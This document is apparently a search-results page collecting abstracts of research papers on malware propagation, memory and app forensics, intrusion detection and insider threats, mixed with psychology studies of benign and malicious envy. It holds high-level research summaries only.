FORENSIC ANALYSIS OF WINDOW’S® VIRTUAL MEMORY INCORPORATING THE SYSTEM’S PAGEFILE COUNTERINTELLIGENCE THROUGH MALICIOUS CODE ANALYSIS

DOE Office of Scientific and Technical Information (OSTI.GOV)

Jared Stimson

FORENSIC ANALYSIS OF WINDOW’S® VIRTUAL MEMORY INCORPORATING THE SYSTEM’S PAGEFILE Computer Forensics is concerned with the use of computer investigation and analysis techniques in order to collect evidence suitable for presentation in court. The examination of volatile memory is a relatively new but important area in computer forensics. More recently criminals are becoming more forensically aware and are now able to compromise computers without accessing the hard disk of the target computer. This means that traditional incident response practice of pulling the plug will destroy the only evidence of the crime. While some techniques are available for acquiring the contentsmore » of main memory, few exist which can analyze these data in a meaningful way. One reason for this is how memory is managed by the operating system. Data belonging to one process can be distributed arbitrarily across physical memory or the hard disk, making it very difficult to recover useful information. This report will focus on how these disparate sources of information can be combined to give a single, contiguous address space for each process. Using address translation a tool is developed to reconstruct the virtual address space of a process by combining a physical memory dump with the page-file on the hard disk. COUNTERINTELLIGENCE THROUGH MALICIOUS CODE ANALYSIS As computer network technology continues to grow so does the reliance on this technology for everyday business functionality. To appeal to customers and employees alike, businesses are seeking an increased online prescience, and to increase productivity the same businesses are computerizing their day-to-day operations. The combination of a publicly accessible interface to the businesses network, and the increase in the amount of intellectual property present on these networks presents serious risks. All of this intellectual property now faces constant attacks from a wide variety of malicious software that is intended to uncover company and government secrets. Every year billions of dollars are invested in preventing and recovering from the introduction of malicious code into a system. However, there is little research being done on leveraging these attacks for counterintelligence opportunities. With the ever-increasing number of vulnerable computers on the Internet the task of attributing these attacks to an organization or a single person is a daunting one. This thesis will demonstrate the idea of intentionally running a piece of malicious code in a secure environment in order to gain counterintelligence on an attacker.« less

WiFi networks and malware epidemiology

PubMed Central

Hu, Hao; Myers, Steven; Colizza, Vittoria; Vespignani, Alessandro

2009-01-01

In densely populated urban areas WiFi routers form a tightly interconnected proximity network that can be exploited as a substrate for the spreading of malware able to launch massive fraudulent attacks. In this article, we consider several scenarios for the deployment of malware that spreads over the wireless channel of major urban areas in the US. We develop an epidemiological model that takes into consideration prevalent security flaws on these routers. The spread of such a contagion is simulated on real-world data for georeferenced wireless routers. We uncover a major weakness of WiFi networks in that most of the simulated scenarios show tens of thousands of routers infected in as little as 2 weeks, with the majority of the infections occurring in the first 24–48 h. We indicate possible containment and prevention measures and provide computational estimates for the rate of encrypted routers that would stop the spreading of the epidemics by placing the system below the percolation threshold. PMID:19171909

WiFi networks and malware epidemiology.

PubMed

Hu, Hao; Myers, Steven; Colizza, Vittoria; Vespignani, Alessandro

2009-02-03

In densely populated urban areas WiFi routers form a tightly interconnected proximity network that can be exploited as a substrate for the spreading of malware able to launch massive fraudulent attacks. In this article, we consider several scenarios for the deployment of malware that spreads over the wireless channel of major urban areas in the US. We develop an epidemiological model that takes into consideration prevalent security flaws on these routers. The spread of such a contagion is simulated on real-world data for georeferenced wireless routers. We uncover a major weakness of WiFi networks in that most of the simulated scenarios show tens of thousands of routers infected in as little as 2 weeks, with the majority of the infections occurring in the first 24-48 h. We indicate possible containment and prevention measures and provide computational estimates for the rate of encrypted routers that would stop the spreading of the epidemics by placing the system below the percolation threshold.

Effect of Gratitude on Benign and Malicious Envy: The Mediating Role of Social Support.

PubMed

Xiang, Yanhui; Chao, Xiaomei; Ye, Yanyan

2018-01-01

Gratitude has been investigated in various areas in psychology. The present research showed that gratitude had some positive effects on some aspects of our life, such as subjective well-being, life satisfaction, and social relationships. It can also help us relieve negative emotions. However, the existing literature has not studied the influence of gratitude on envy. The present study used structural equation modeling to test the mediating role of social support between gratitude and two types of envy (malicious and benign). We recruited 426 Chinese undergraduates to complete the Gratitude Questionnaire, Malicious and Benign Envy Scales, and the Multi-Dimensional Scale of Perceived Social Support. Results showed that gratitude positively predicted benign envy and negatively predicted malicious envy. In addition, the indirect effect of gratitude on two types of envy via social support was significant. These results revealed the direct relationship between gratitude and malicious/benign envy, and the mediating effect of social support, which will contribute to find effective measures to inhibit malicious envy and promote benign envy from the perspective of cultivating gratitude and increasing individuals' social support.

Effect of Gratitude on Benign and Malicious Envy: The Mediating Role of Social Support

PubMed Central

Xiang, Yanhui; Chao, Xiaomei; Ye, Yanyan

2018-01-01

Gratitude has been investigated in various areas in psychology. The present research showed that gratitude had some positive effects on some aspects of our life, such as subjective well-being, life satisfaction, and social relationships. It can also help us relieve negative emotions. However, the existing literature has not studied the influence of gratitude on envy. The present study used structural equation modeling to test the mediating role of social support between gratitude and two types of envy (malicious and benign). We recruited 426 Chinese undergraduates to complete the Gratitude Questionnaire, Malicious and Benign Envy Scales, and the Multi-Dimensional Scale of Perceived Social Support. Results showed that gratitude positively predicted benign envy and negatively predicted malicious envy. In addition, the indirect effect of gratitude on two types of envy via social support was significant. These results revealed the direct relationship between gratitude and malicious/benign envy, and the mediating effect of social support, which will contribute to find effective measures to inhibit malicious envy and promote benign envy from the perspective of cultivating gratitude and increasing individuals' social support. PMID:29867595

A fragile zero watermarking scheme to detect and characterize malicious modifications in database relations.

PubMed

Khan, Aihab; Husain, Syed Afaq

2013-01-01

We put forward a fragile zero watermarking scheme to detect and characterize malicious modifications made to a database relation. Most of the existing watermarking schemes for relational databases introduce intentional errors or permanent distortions as marks into the database original content. These distortions inevitably degrade the data quality and data usability as the integrity of a relational database is violated. Moreover, these fragile schemes can detect malicious data modifications but do not characterize the tempering attack, that is, the nature of tempering. The proposed fragile scheme is based on zero watermarking approach to detect malicious modifications made to a database relation. In zero watermarking, the watermark is generated (constructed) from the contents of the original data rather than introduction of permanent distortions as marks into the data. As a result, the proposed scheme is distortion-free; thus, it also resolves the inherent conflict between security and imperceptibility. The proposed scheme also characterizes the malicious data modifications to quantify the nature of tempering attacks. Experimental results show that even minor malicious modifications made to a database relation can be detected and characterized successfully.

Gelotophobia and the Challenges of Implementing Laughter into Virtual Agents Interactions

PubMed Central

Ruch, Willibald F.; Platt, Tracey; Hofmann, Jennifer; Niewiadomski, Radosław; Urbain, Jérôme; Mancini, Maurizio; Dupont, Stéphane

2014-01-01

This study investigated which features of AVATAR laughter are perceived threatening for individuals with a fear of being laughed at (gelotophobia), and individuals with no gelotophobia. Laughter samples were systematically varied (e.g., intensity, laughter pitch, and energy for the voice, intensity of facial actions of the face) in three modalities: animated facial expressions, synthesized auditory laughter vocalizations, and motion capture generated puppets displaying laughter body movements. In the online study 123 adults completed, the GELOPH <15 > (Ruch and Proyer, 2008a,b) and rated randomly presented videos of the three modalities for how malicious, how friendly, how real the laughter was (0 not at all to 8 extremely). Additionally, an open question asked which markers led to the perception of friendliness/maliciousness. The current study identified features in all modalities of laughter stimuli that were perceived as malicious in general, and some that were gelotophobia specific. For facial expressions of AVATARS, medium intensity laughs triggered highest maliciousness in the gelotophobes. In the auditory stimuli, the fundamental frequency modulations and the variation in intensity were indicative of maliciousness. In the body, backwards and forward movements and rocking vs. jerking movements distinguished the most malicious from the least malicious laugh. From the open answers, the shape and appearance of the lips curling induced feelings that the expression was malicious for non-gelotophobes and that the movement round the eyes, elicited the face to appear as friendly. This was opposite for gelotophobes. Gelotophobia savvy AVATARS should be of high intensity, containing lip and eye movements and be fast, non-repetitive voiced vocalization, variable and of short duration. It should not contain any features that indicate a down-regulation in the voice or body, or indicate voluntary/cognitive modulation. PMID:25477803

Mobile code security

NASA Astrophysics Data System (ADS)

Ramalingam, Srikumar

2001-11-01

A highly secure mobile agent system is very important for a mobile computing environment. The security issues in mobile agent system comprise protecting mobile hosts from malicious agents, protecting agents from other malicious agents, protecting hosts from other malicious hosts and protecting agents from malicious hosts. Using traditional security mechanisms the first three security problems can be solved. Apart from using trusted hardware, very few approaches exist to protect mobile code from malicious hosts. Some of the approaches to solve this problem are the use of trusted computing, computing with encrypted function, steganography, cryptographic traces, Seal Calculas, etc. This paper focuses on the simulation of some of these existing techniques in the designed mobile language. Some new approaches to solve malicious network problem and agent tampering problem are developed using public key encryption system and steganographic concepts. The approaches are based on encrypting and hiding the partial solutions of the mobile agents. The partial results are stored and the address of the storage is destroyed as the agent moves from one host to another host. This allows only the originator to make use of the partial results. Through these approaches some of the existing problems are solved.

Windows Instant Messaging App Forensics: Facebook and Skype as Case Studies

PubMed Central

Yang, Teing Yee; Dehghantanha, Ali; Choo, Kim-Kwang Raymond; Muda, Zaiton

2016-01-01

Instant messaging (IM) has changed the way people communicate with each other. However, the interactive and instant nature of these applications (apps) made them an attractive choice for malicious cyber activities such as phishing. The forensic examination of IM apps for modern Windows 8.1 (or later) has been largely unexplored, as the platform is relatively new. In this paper, we seek to determine the data remnants from the use of two popular Windows Store application software for instant messaging, namely Facebook and Skype on a Windows 8.1 client machine. This research contributes to an in-depth understanding of the types of terrestrial artefacts that are likely to remain after the use of instant messaging services and application software on a contemporary Windows operating system. Potential artefacts detected during the research include data relating to the installation or uninstallation of the instant messaging application software, log-in and log-off information, contact lists, conversations, and transferred files. PMID:26982207

Windows Instant Messaging App Forensics: Facebook and Skype as Case Studies.

PubMed

Yang, Teing Yee; Dehghantanha, Ali; Choo, Kim-Kwang Raymond; Muda, Zaiton

2016-01-01

Instant messaging (IM) has changed the way people communicate with each other. However, the interactive and instant nature of these applications (apps) made them an attractive choice for malicious cyber activities such as phishing. The forensic examination of IM apps for modern Windows 8.1 (or later) has been largely unexplored, as the platform is relatively new. In this paper, we seek to determine the data remnants from the use of two popular Windows Store application software for instant messaging, namely Facebook and Skype on a Windows 8.1 client machine. This research contributes to an in-depth understanding of the types of terrestrial artefacts that are likely to remain after the use of instant messaging services and application software on a contemporary Windows operating system. Potential artefacts detected during the research include data relating to the installation or uninstallation of the instant messaging application software, log-in and log-off information, contact lists, conversations, and transferred files.

Dispositional envy revisited: unraveling the motivational dynamics of benign and malicious envy.

PubMed

Lange, Jens; Crusius, Jan

2015-02-01

Previous research has conceptualized dispositional envy as a unitary construct. Recently however, episodic envy has been shown to emerge in two qualitatively different forms. Benign envy is related to the motivation to move upward, whereas malicious envy is related to pulling superior others down. In four studies (N = 1,094)--using the newly developed Benign and Malicious Envy Scale (BeMaS)--we show that dispositional envy is also characterized by two independent dimensions related to distinct motivational dynamics and behavioral consequences. Dispositional benign and malicious envy uniquely predict envious responding following upward social comparisons. Furthermore, they are differentially connected to hope for success and fear of failure. Corresponding to these links, dispositional benign envy predicted faster race performance of marathon runners mediated via higher goal setting. In contrast, dispositional malicious envy predicted race goal disengagement. The findings highlight that disentangling the two sides of envy opens up numerous research avenues. © 2014 by the Society for Personality and Social Psychology, Inc.

GlobalTrust: An Attack Resilient Reputation System for Tactical Networks

DTIC Science & Technology

2014-07-03

MSA): Some malicious nodes misbehave while other malicious nodes, called malicious spies, behave normally by providing proper services. These...disseminate conflicting (or inconsistent) LTOs. For example, they may misbehave only to a subset of honest nodes (referred to as target nodes) to... misbehaving with prob. α honestly reporting LTOs NRA misbehaving with prob. α reporting opposite LTOs, 1− α CRA misbehaving with prob. α reporting

Social Networking—Another Breach In The Wall

NASA Astrophysics Data System (ADS)

Bamnote, Gajendra; Patil, Gajendra; Shejole, Amol

2010-11-01

With the increasing popularity of social networks like Facebook and MySpace, such sites have lately become the favourite destinations for spammers and attackers. Social networks have experienced complex social engineering attacks, massive spam and aggressive malware distribution in the recent past. This paper presents a practical case study of social engineering, malware distribution and phishing attacks against social networking sites that are identified over last few months. It is explained how private data of the users are exposed to attackers and how easily their privacy is compromised as a result of these attacks and their own careless behaviour.

Secure VM for Monitoring Industrial Process Controllers

DOE Office of Scientific and Technical Information (OSTI.GOV)

Dasgupta, Dipankar; Ali, Mohammad Hassan; Abercrombie, Robert K

2011-01-01

In this paper, we examine the biological immune system as an autonomic system for self-protection, which has evolved over millions of years probably through extensive redesigning, testing, tuning and optimization process. The powerful information processing capabilities of the immune system, such as feature extraction, pattern recognition, learning, memory, and its distributive nature provide rich metaphors for its artificial counterpart. Our study focuses on building an autonomic defense system, using some immunological metaphors for information gathering, analyzing, decision making and launching threat and attack responses. In order to detection Stuxnet like malware, we propose to include a secure VM (or dedicatedmore » host) to the SCADA Network to monitor behavior and all software updates. This on-going research effort is not to mimic the nature but to explore and learn valuable lessons useful for self-adaptive cyber defense systems.« less

Design of Cyber Attack Precursor Symptom Detection Algorithm through System Base Behavior Analysis and Memory Monitoring

NASA Astrophysics Data System (ADS)

Jung, Sungmo; Kim, Jong Hyun; Cagalaban, Giovanni; Lim, Ji-Hoon; Kim, Seoksoo

More recently, botnet-based cyber attacks, including a spam mail or a DDos attack, have sharply increased, which poses a fatal threat to Internet services. At present, antivirus businesses make it top priority to detect malicious code in the shortest time possible (Lv.2), based on the graph showing a relation between spread of malicious code and time, which allows them to detect after malicious code occurs. Despite early detection, however, it is not possible to prevent malicious code from occurring. Thus, we have developed an algorithm that can detect precursor symptoms at Lv.1 to prevent a cyber attack using an evasion method of 'an executing environment aware attack' by analyzing system behaviors and monitoring memory.

Advancing botnet modeling techniques for military and security simulations

NASA Astrophysics Data System (ADS)

Banks, Sheila B.; Stytz, Martin R.

2011-06-01

Simulation environments serve many purposes, but they are only as good as their content. One of the most challenging and pressing areas that call for improved content is the simulation of bot armies (botnets) and their effects upon networks and computer systems. Botnets are a new type of malware, a type that is more powerful and potentially dangerous than any other type of malware. A botnet's power derives from several capabilities including the following: 1) the botnet's capability to be controlled and directed throughout all phases of its activity, 2) a command and control structure that grows increasingly sophisticated, and 3) the ability of a bot's software to be updated at any time by the owner of the bot (a person commonly called a bot master or bot herder.) Not only is a bot army powerful and agile in its technical capabilities, a bot army can be extremely large, can be comprised of tens of thousands, if not millions, of compromised computers or it can be as small as a few thousand targeted systems. In all botnets, their members can surreptitiously communicate with each other and their command and control centers. In sum, these capabilities allow a bot army to execute attacks that are technically sophisticated, difficult to trace, tactically agile, massive, and coordinated. To improve our understanding of their operation and potential, we believe that it is necessary to develop computer security simulations that accurately portray bot army activities, with the goal of including bot army simulations within military simulation environments. In this paper, we investigate issues that arise when simulating bot armies and propose a combination of the biologically inspired MSEIR infection spread model coupled with the jump-diffusion infection spread model to portray botnet propagation.

Cyber Moat: Adaptive Virtualized Network Framework for Deception and Disinformation

DTIC Science & Technology

2016-12-12

As one type of bots, web crawlers have been leveraged by search engines (e.g., Googlebot by Google) to popularize websites through website indexing...However, the number of malicious bots is increasing too. To regulate the behavior of crawlers, most websites include a file called "robots.txt" that...However, "robots.txt" only provides a guideline, and almost all malicious robots ignore it. Moreover, since this file is publicly available, malicious

Leveling up and down: the experiences of benign and malicious envy.

PubMed

van de Ven, Niels; Zeelenberg, Marcel; Pieters, Rik

2009-06-01

Envy is the painful emotion caused by the good fortune of others. This research empirically supports the distinction between two qualitatively different types of envy, namely benign and malicious envy. It reveals that the experience of benign envy leads to a moving-up motivation aimed at improving one's own position, whereas the experience of malicious envy leads to a pulling-down motivation aimed at damaging the position of the superior other. Study 1 used guided recall of the two envy types in a culture (the Netherlands) that has separate words for benign and malicious envy. Analyses of the experiential content of these emotions found the predicted differences. Study 2 and 3 used one sample from the United States and one from Spain, respectively, where a single word exists for both envy types. A latent class analysis based on the experiential content of envy confirmed the existence of separate experiences of benign and malicious envy in both these cultures as well. The authors discuss the implications of distinguishing the two envy types for theories of cooperation, group performance, and Schadenfreude.

Architecture for removable media USB-ARM

DOEpatents

Shue, Craig A.; Lamb, Logan M.; Paul, Nathanael R.

2015-07-14

A storage device is coupled to a computing system comprising an operating system and application software. Access to the storage device is blocked by a kernel filter driver, except exclusive access is granted to a first anti-virus engine. The first anti-virus engine is directed to scan the storage device for malicious software and report results. Exclusive access may be granted to one or more other anti-virus engines and they may be directed to scan the storage device and report results. Approval of all or a portion of the information on the storage device is based on the results from the first anti-virus engine and the other anti-virus engines. The storage device is presented to the operating system and access is granted to the approved information. The operating system may be a Microsoft Windows operating system. The kernel filter driver and usage of anti-virus engines may be configurable by a user.

Bifurcation analysis of a delay reaction-diffusion malware propagation model with feedback control

NASA Astrophysics Data System (ADS)

Zhu, Linhe; Zhao, Hongyong; Wang, Xiaoming

2015-05-01

With the rapid development of network information technology, information networks security has become a very critical issue in our work and daily life. This paper attempts to develop a delay reaction-diffusion model with a state feedback controller to describe the process of malware propagation in mobile wireless sensor networks (MWSNs). By analyzing the stability and Hopf bifurcation, we show that the state feedback method can successfully be used to control unstable steady states or periodic oscillations. Moreover, formulas for determining the properties of the bifurcating periodic oscillations are derived by applying the normal form method and center manifold theorem. Finally, we conduct extensive simulations on large-scale MWSNs to evaluate the proposed model. Numerical evidences show that the linear term of the controller is enough to delay the onset of the Hopf bifurcation and the properties of the bifurcation can be regulated to achieve some desirable behaviors by choosing the appropriate higher terms of the controller. Furthermore, we obtain that the spatial-temporal dynamic characteristics of malware propagation are closely related to the rate constant for nodes leaving the infective class for recovered class and the mobile behavior of nodes.

Design of Provider-Provisioned Website Protection Scheme against Malware Distribution

NASA Astrophysics Data System (ADS)

Yagi, Takeshi; Tanimoto, Naoto; Hariu, Takeo; Itoh, Mitsutaka

Vulnerabilities in web applications expose computer networks to security threats, and many websites are used by attackers as hopping sites to attack other websites and user terminals. These incidents prevent service providers from constructing secure networking environments. To protect websites from attacks exploiting vulnerabilities in web applications, service providers use web application firewalls (WAFs). WAFs filter accesses from attackers by using signatures, which are generated based on the exploit codes of previous attacks. However, WAFs cannot filter unknown attacks because the signatures cannot reflect new types of attacks. In service provider environments, the number of exploit codes has recently increased rapidly because of the spread of vulnerable web applications that have been developed through cloud computing. Thus, generating signatures for all exploit codes is difficult. To solve these problems, our proposed scheme detects and filters malware downloads that are sent from websites which have already received exploit codes. In addition, to collect information for detecting malware downloads, web honeypots, which automatically extract the communication records of exploit codes, are used. According to the results of experiments using a prototype, our scheme can filter attacks automatically so that service providers can provide secure and cost-effective network environments.

AIDE - Advanced Intrusion Detection Environment

DOE Office of Scientific and Technical Information (OSTI.GOV)

Smith, Cathy L.

2013-04-28

Would you like to know when someone has dropped an undesirable executable binary on our system? What about something less malicious such as a software installation by a user? What about the user who decides to install a newer version of mod_perl or PHP on your web server without letting you know beforehand? Or even something as simple as when an undocumented config file change is made by another member of the admin group? Do you even want to know about all the changes that happen on a daily basis on your server? The purpose of an intrusion detection systemmore » (IDS) is to detect unauthorized, possibly malicious activity. The purpose of a host-based IDS, or file integrity checker, is check for unauthorized changes to key system files, binaries, libraries, and directories on the system. AIDE is an Open Source file and directory integrity checker. AIDE will let you know when a file or directory has been added, deleted, modified. It is included with the Red Hat Enterprise 6. It is available for other Linux distros. This is a case study describing the process of configuring AIDE on an out of the box RHEL6 installation. Its goal is to illustrate the thinking and the process by which a useful AIDE configuration is built.« less

Statistics attack on `quantum private comparison with a malicious third party' and its improvement

NASA Astrophysics Data System (ADS)

Gu, Jun; Ho, Chih-Yung; Hwang, Tzonelih

2018-02-01

Recently, Sun et al. (Quantum Inf Process:14:2125-2133, 2015) proposed a quantum private comparison protocol allowing two participants to compare the equality of their secrets via a malicious third party (TP). They designed an interesting trap comparison method to prevent the TP from knowing the final comparison result. However, this study shows that the malicious TP can use the statistics attack to reveal the comparison result. A simple modification is hence proposed to solve this problem.

When envy leads to schadenfreude.

PubMed

van de Ven, Niels; Hoogland, Charles E; Smith, Richard H; van Dijk, Wilco W; Breugelmans, Seger M; Zeelenberg, Marcel

2015-01-01

Previous research has yielded inconsistent findings concerning the relationship between envy and schadenfreude. Three studies examined whether the distinction between benign and malicious envy can resolve this inconsistency. We found that malicious envy is related to schadenfreude, while benign envy is not. This result held both in the Netherlands where benign and malicious envy are indicated by separate words (Study 1: Sample A, N = 139; Sample B, N = 150), and in the USA where a single word is used to denote both types (Study 2, N = 180; Study 3, N = 349). Moreover, the effect of malicious envy on schadenfreude was independent of other antecedents of schadenfreude (such as feelings of inferiority, disliking the target person, anger, and perceived deservedness). These findings improve our understanding of the antecedents of schadenfreude and help reconcile seemingly contradictory findings on the relationship between envy and schadenfreude.

Spy the Lie: Detecting Malicious Insiders

DOE Office of Scientific and Technical Information (OSTI.GOV)

Noonan, Christine F.

Insider threat is a hard problem. There is no ground truth, there are innumerable variables, and the data is sparse. The types of crimes and abuses associated with insider threats are significant; the most serious include espionage, sabotage, terrorism, embezzlement, extortion, bribery, and corruption. Malicious activities include an even broader range of exploits, such as negligent use of classified data, fraud, cybercrime, unauthorized access to sensitive information, and illicit communications with unauthorized recipients. Inadvertent action or inaction without malicious intent (e.g., disposing of sensitive documents incorrectly) can also cause harm to an organization. This review article will explore insider threat,more » specifically behaviors, beliefs, and current debates within the field. Additionally particular focus is given to deception, a significant behavioral component of the malicious insider. Finally, research and policy implications for law enforcement and the intelligence community are addressed.« less

CernVM WebAPI - Controlling Virtual Machines from the Web

NASA Astrophysics Data System (ADS)

Charalampidis, I.; Berzano, D.; Blomer, J.; Buncic, P.; Ganis, G.; Meusel, R.; Segal, B.

2015-12-01

Lately, there is a trend in scientific projects to look for computing resources in the volunteering community. In addition, to reduce the development effort required to port the scientific software stack to all the known platforms, the use of Virtual Machines (VMs)u is becoming increasingly popular. Unfortunately their use further complicates the software installation and operation, restricting the volunteer audience to sufficiently expert people. CernVM WebAPI is a software solution addressing this specific case in a way that opens wide new application opportunities. It offers a very simple API for setting-up, controlling and interfacing with a VM instance in the users computer, while in the same time offloading the user from all the burden of downloading, installing and configuring the hypervisor. WebAPI comes with a lightweight javascript library that guides the user through the application installation process. Malicious usage is prohibited by offering a per-domain PKI validation mechanism. In this contribution we will overview this new technology, discuss its security features and examine some test cases where it is already in use.

Image manipulation: Fraudulence in digital dental records: Study and review

PubMed Central

Chowdhry, Aman; Sircar, Keya; Popli, Deepika Bablani; Tandon, Ankita

2014-01-01

Introduction: In present-day times, freely available software allows dentists to tweak their digital records as never before. But, there is a fine line between acceptable enhancements and scientific delinquency. Aims and Objective: To manipulate digital images (used in forensic dentistry) of casts, lip prints, and bite marks in order to highlight tampering techniques and methods of detecting and preventing manipulation of digital images. Materials and Methods: Digital image records of forensic data (casts, lip prints, and bite marks photographed using Samsung Techwin L77 digital camera) were manipulated using freely available software. Results: Fake digital images can be created either by merging two or more digital images, or by altering an existing image. Discussion and Conclusion: Retouched digital images can be used for fraudulent purposes in forensic investigations. However, tools are available to detect such digital frauds, which are extremely difficult to assess visually. Thus, all digital content should mandatorily have attached metadata and preferably watermarking in order to avert their malicious re-use. Also, computer alertness, especially about imaging software's, should be promoted among forensic odontologists/dental professionals. PMID:24696587

Whatever Happened to Formal Methods for Security?

PubMed

Voas, J; Schaffer, K

2016-08-01

We asked 7 experts 7 questions to find out what has occurred recently in terms of applying formal methods (FM) to security-centric, cyber problems. We are continually reminded of the 1996 paper by Tony Hoare "How did Software Get So Reliable Without Proof?" [1] In that vein, how did we get so insecure with proof? Given daily press announcements concerning new malware, data breaches, and privacy loss, is FM still relevant or was it ever? Our experts answered with unique personal insights. We were curious as to whether this successful methodology in "safety-critical" has succeeded as well for today's "build it, hack it, patch it" mindset. Our experts were John McLean (Naval Research Labs), Paul Black (National Institute of Standards and Technology), Karl Levitt (University of California at Davis), Joseph Williams (CloudEconomist.Com), Connie Heitmeyer (Naval Research Labs), Eugene Spafford (Purdue University), and Joseph Kiniry (Galois, Inc.). The questions and responses follow.

SIMPL Systems, or: Can We Design Cryptographic Hardware without Secret Key Information?

NASA Astrophysics Data System (ADS)

Rührmair, Ulrich

This paper discusses a new cryptographic primitive termed SIMPL system. Roughly speaking, a SIMPL system is a special type of Physical Unclonable Function (PUF) which possesses a binary description that allows its (slow) public simulation and prediction. Besides this public key like functionality, SIMPL systems have another advantage: No secret information is, or needs to be, contained in SIMPL systems in order to enable cryptographic protocols - neither in the form of a standard binary key, nor as secret information hidden in random, analog features, as it is the case for PUFs. The cryptographic security of SIMPLs instead rests on (i) a physical assumption on their unclonability, and (ii) a computational assumption regarding the complexity of simulating their output. This novel property makes SIMPL systems potentially immune against many known hardware and software attacks, including malware, side channel, invasive, or modeling attacks.

Towards Reducing the Data Exfiltration Surface for the Insider Threat

DOE Office of Scientific and Technical Information (OSTI.GOV)

Schlicher, Bob G; MacIntyre, Lawrence Paul; Abercrombie, Robert K

Unauthorized data exfiltrations from both insiders and outsiders are costly and damaging. Network communication resources can be used for transporting data illicitly out of the enterprise or cloud. Combined with built-in malware copying utilities, we define this as comprising the Data Exfiltration Surface (DXS). For securing valuable data, it is desirable to reduce the DXS and maintain controls on the egress points. Our approach is to host the data in a protected enclave that includes novel software Data Diode (SDD) installed on a secured, border gateway. The SDD allows copying data into the enclave systems but denies data from beingmore » copied out. Simultaneously, it permits remote access with remote desktop and console applications. Our tests demonstrate that we are able to effectively reduce the DXS and we are able to protect data from being exfiltrated through the use of the SDD.« less

The effects of malicious nodes on performance of mobile ad hoc networks

NASA Astrophysics Data System (ADS)

Li, Fanzhi; Shi, Xiyu; Jassim, Sabah; Adams, Christopher

2006-05-01

Wireless ad hoc networking offers convenient infrastructureless communication over the shared wireless channel. However, the nature of ad hoc networks makes them vulnerable to security attacks. Unlike their wired counterpart, infrastructureless ad hoc networks do not have a clear line of defense, their topology is dynamically changing, and every mobile node can receive messages from its neighbors and can be contacted by all other nodes in its neighborhood. This poses a great danger to network security if some nodes behave in a malicious manner. The immediate concern about the security in this type of networks is how to protect the network and the individual mobile nodes against malicious act of rogue nodes from within the network. This paper is concerned with security aspects of wireless ad hoc networks. We shall present results of simulation experiments on ad hoc network's performance in the presence of malicious nodes. We shall investigate two types of attacks and the consequences will be simulated and quantified in terms of loss of packets and other factors. The results show that network performance, in terms of successful packet delivery ratios, significantly deteriorates when malicious nodes act according to the defined misbehaving characteristics.

Impact of malicious servers over trust and reputation models in wireless sensor networks

NASA Astrophysics Data System (ADS)

Verma, Vinod Kumar; Singh, Surinder; Pathak, N. P.

2016-03-01

This article deals with the impact of malicious servers over different trust and reputation models in wireless sensor networks. First, we analysed the five trust and reputation models, namely BTRM-WSN, Eigen trust, peer trust, power trust, linguistic fuzzy trust model. Further, we proposed wireless sensor network design for optimisation of these models. Finally, influence of malicious servers on the behaviour of above mentioned trust and reputation models is discussed. Statistical analysis has been carried out to prove the validity of our proposal.

CSIRT Requirements for Situational Awareness

DTIC Science & Technology

2014-01-25

deepsight-products http://www.symantec.com/security_response/publications/threatreport.jsp Verizon Verizon produces an annual data breach report...impact studies to the differences between malicious versus non-malicious data breaches . Ponemon also offers con- sulting services. Ponemon also

Elucidating the Dark Side of Envy: Distinctive Links of Benign and Malicious Envy With Dark Personalities

PubMed Central

Lange, Jens; Paulhus, Delroy L.; Crusius, Jan

2017-01-01

Researchers have recently drawn a contrast between two forms of envy: benign and malicious envy. In three studies (total N = 3,123), we challenge the assumption that malicious envy is destructive, whereas benign envy is entirely constructive. Instead, both forms have links with the Dark Triad of personality. Benign envy is associated with Machiavellian behaviors, whereas malicious envy is associated with both Machiavellian and psychopathic behaviors. In Study 1, this pattern emerged from meta-analyzed trait correlations. In Study 2, a manipulation affecting the envy forms mediated an effect on antisocial behavioral intentions. Study 3 replicated these patterns by linking envy to specific antisocial behaviors and their impact on status in the workplace. Together, our correlational and experimental results suggest that the two forms of envy can both be malevolent. Instead of evaluating envy’s morality, we propose to focus on its functional value. PMID:29271287

DOE Office of Scientific and Technical Information (OSTI.GOV)

Belangia, David Warren

The Home Depot Data Breach is the second largest data breach on record. It has or will affect up to 56 million debit or credit cards. A trusted vendor account, coupled with the use of a previously unknown variant of malware that allowed the establishment of a foothold, was the entry point into the Home Depot network. Once inside the perimeter, privilege escalation provided an avenue to obtain the desired information. Home Depot did, however, learn some lessons from Target. Home Depot certainly communicated better than Target, procured insurance, and instituted as secure an environment as possible. There are specificmore » measures an institution should undertake to prepare for a data breach, and everyone can learn from this breach. Publicly available information about the Home Depot Data Breach provides insight into the attack, an old malware variant with a new twist.While the malware was modified as to be unrecognizable with tools, it probably should have been detected. There are also concerns with Home Depot’s insurance and the insurance provider’s apparent lack of fully reimbursing Home Depot for their losses. The effect on shareholders and Home Depot’s stock price was short lived. This story is still evolving but provides interesting lessons learned concerning how an organization should prepare for it inevitable breach.« less

An overview of computer viruses in a research environment

NASA Technical Reports Server (NTRS)

Bishop, Matt

1991-01-01

The threat of attack by computer viruses is in reality a very small part of a much more general threat, specifically threats aimed at subverting computer security. Here, computer viruses are examined as a malicious logic in a research and development environment. A relation is drawn between the viruses and various models of security and integrity. Current research techniques aimed at controlling the threats posed to computer systems by threatening viruses in particular and malicious logic in general are examined. Finally, a brief examination of the vulnerabilities of research and development systems that malicious logic and computer viruses may exploit is undertaken.

Modelling Metamorphism by Abstract Interpretation

NASA Astrophysics Data System (ADS)

Dalla Preda, Mila; Giacobazzi, Roberto; Debray, Saumya; Coogan, Kevin; Townsend, Gregg M.

Metamorphic malware apply semantics-preserving transformations to their own code in order to foil detection systems based on signature matching. In this paper we consider the problem of automatically extract metamorphic signatures from these malware. We introduce a semantics for self-modifying code, later called phase semantics, and prove its correctness by showing that it is an abstract interpretation of the standard trace semantics. Phase semantics precisely models the metamorphic code behavior by providing a set of traces of programs which correspond to the possible evolutions of the metamorphic code during execution. We show that metamorphic signatures can be automatically extracted by abstract interpretation of the phase semantics, and that regular metamorphism can be modelled as finite state automata abstraction of the phase semantics.

Scada Malware, a Proof of Concept

NASA Astrophysics Data System (ADS)

Carcano, Andrea; Fovino, Igor Nai; Masera, Marcelo; Trombetta, Alberto

